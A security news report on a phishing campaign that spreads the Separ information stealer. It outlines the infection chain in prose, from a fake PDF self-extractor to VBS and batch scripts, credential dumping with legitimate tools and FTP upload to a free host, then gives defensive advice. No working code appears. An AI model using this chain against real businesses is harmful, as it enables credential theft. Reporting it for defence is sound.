An ongoing phishing campaign is targeting businesses and distributing the information-stealing Separ malware. The campaign has mostly concentrated on businesses in South East Asia and the Middle East, although some businesses in North America have also been attacked.
The Separ information stealer has been in use since September 2017, with earlier versions of the info-stealer dating back to 2013. The latest campaign, which uses an updated version of the malware, was detected in late January by researchers at Deep Instinct. Since then, more than 200 businesses and over 1,000 individuals have been attacked.
The threat actors have not gone to any lengths to prevent analysis of the malware and the attack mechanism is very simple, but it is providing to be effective. The attack starts with a phishing email containing a fake PDF file which is a self-extracting executable. The emails claim to contain quotes, shipment notices, or equipment specifications, the details of which can be found by opening the PDF file.
If the file attachment is opened, the self-extractor calls wscript.exe which runs a Visual Basic Script (adobel.vbs) contained in the self-extractor. The VB script runs two small batch scripts. The first (adob01.bat) sets up directories and copies files using xcopy.exe and attrib.exe, and then launches a second batch script (adob02.bat) which performs various malicious functions. An empty decoy jpeg file is opened which hides command windows from the user.
The firewall settings are changed, and email credentials and credentials stored in browsers are stolen using SecurityXploded password dumping tools. The credentials are exported using an FTP client to freehostia.com. The FTP client and the service are both legitimate and the data theft may therefore go undetected.
Deep Instinct refers to the techniques as a Living off the Land attack, as it uses legitimate files and services to carry out its malicious functions.
Businesses can protect against this attack by restricting the use of scripting tools. Anti-spam solutions can help to prevent the malicious emails from being delivered and end users should be trained on email security best practices, such as never opening attachments from unknown senders.